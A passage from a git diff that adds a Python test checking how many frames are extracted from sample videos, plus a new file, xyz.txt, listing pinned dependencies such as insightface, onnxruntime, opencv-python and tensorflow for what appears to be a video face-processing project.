('.assets/examples/target-240p-30fps.mp4', 100), + ('.assets/examples/target-240p-60fps.mp4', 50) + ] + for target_path, frame_total in data_provider: + temp_directory_path = get_temp_directory_path(target_path) + create_temp(target_path) + + assert extract_frames(target_path, 30.0) is True + assert len(glob.glob1(temp_directory_path, '*.jpg')) == frame_total + + clear_temp(target_path) diff --git a/xyz.txt b/xyz.txt new file mode 100644 index 0000000000000000000000000000000000000000..f381ae5dc8bd37823ff98638ff252be9bbce8eec --- /dev/null +++ b/xyz.txt @@ -0,0 +1,11 @@ +insightface==0.7.3 +numpy==1.24.3 +onnx==1.14.0 +onnxruntime==1.15.1 +opencv-python==4.8.0.74 +opennsfw2==0.10.2 +protobuf==4.23.4 +pytest==7.4.0 +psutil==5.9.5 +tensorflow==2.13.0 +tqdm==4.65.0